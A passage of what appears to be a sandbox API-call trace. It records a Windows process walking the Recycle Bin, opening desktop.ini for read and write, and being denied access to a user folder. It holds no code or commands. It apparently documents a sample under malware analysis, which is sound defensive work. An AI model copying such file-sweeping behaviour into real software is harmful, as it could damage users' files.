lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0059.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0059.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0059.911] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0059.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0059.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0059.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0059.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0059.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0059.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76d90 [0059.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0059.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0059.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0059.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0059.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0059.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0059.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76d90 | out: hHeap=0x20000) returned 1 [0059.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0059.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0059.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0059.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0059.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0059.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0059.912] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0059.913] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.913] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0059.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0059.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0059.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885e0 [0059.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0059.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0059.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0059.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885e0 | out: hHeap=0x20000) returned 1 [0059.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0059.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0059.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0059.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0059.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76d90 [0059.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0059.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0059.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0059.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0059.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0059.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0059.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885e0 [0059.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71688 [0059.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0059.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885e0 | out: hHeap=0x20000) returned 1 [0059.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0059.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0059.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0059.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.914] AreFileApisANSI () returned 1 [0059.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", lpUsedDefaultChar=0x0) returned 37 [0059.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0059.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0059.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0059.914] AreFileApisANSI () returned 1 [0059.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0059.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d688 [0059.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=37 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 37 [0059.914] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0059.915] GetFileType (hFile=0x418) returned 0x1 [0059.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0059.915] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0059.915] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0059.915] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0059.915] CloseHandle (hObject=0x418) returned 1 [0059.915] AreFileApisANSI () returned 1 [0059.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0059.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d0b0 [0059.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x6d0b0, cchWideChar=37 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 37 [0059.916] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0059.916] GetFileType (hFile=0x418) returned 0x1 [0059.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0059.916] CloseHandle (hObject=0x418) returned 1 [0060.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0060.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0060.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.089] AreFileApisANSI () returned 1 [0060.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0060.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d0b0 [0060.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x6d0b0, cchWideChar=37 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 37 [0060.089] GetFileAttributesExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81)) returned 1 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.089] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x67548, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x48, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓\x81")) returned 0 [0060.089] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0060.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0060.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76d90 | out: hHeap=0x20000) returned 1 [0060.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0060.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0060.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0060.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0060.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0060.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0060.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0060.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0060.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0060.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0060.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.090] AreFileApisANSI () returned 1 [0060.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", lpUsedDefaultChar=0x0) returned 62 [0060.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0060.091] AreFileApisANSI () returned 1 [0060.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x535b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0060.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e580 [0060.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x535b0, cbMultiByte=-1, lpWideCharStr=0x6e580, cchWideChar=62 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000") returned 62 [0060.091] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.091] GetLastError () returned 0x5 [0060.091] GetLastError () returned 0x5 [0060.091] SetLastError (dwErrCode=0x5) [0060.091] GetLastError () returned 0x5 [0060.091] SetLastError (dwErrCode=0x5) [0060.091] GetLastError () returned 0x5 [0060.091] SetLastError (dwErrCode=0x5) [0060.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0060.091] AreFileApisANSI () returned 1 [0060.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x535b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0060.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0060.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x535b0, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000") returned 62 [0060.091] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.091] GetLastError () returned 0x5 [0060.091] GetLastError () returned 0x5 [0060.091] SetLastError (dwErrCode=0x5) [0060.091] GetLastError () returned 0x5 [0060.092] SetLastError (dwErrCode=0x5) [0060.092] GetLastError () returned 0x5 [0060.092] SetLastError (dwErrCode=0x5) [0060.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0060.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 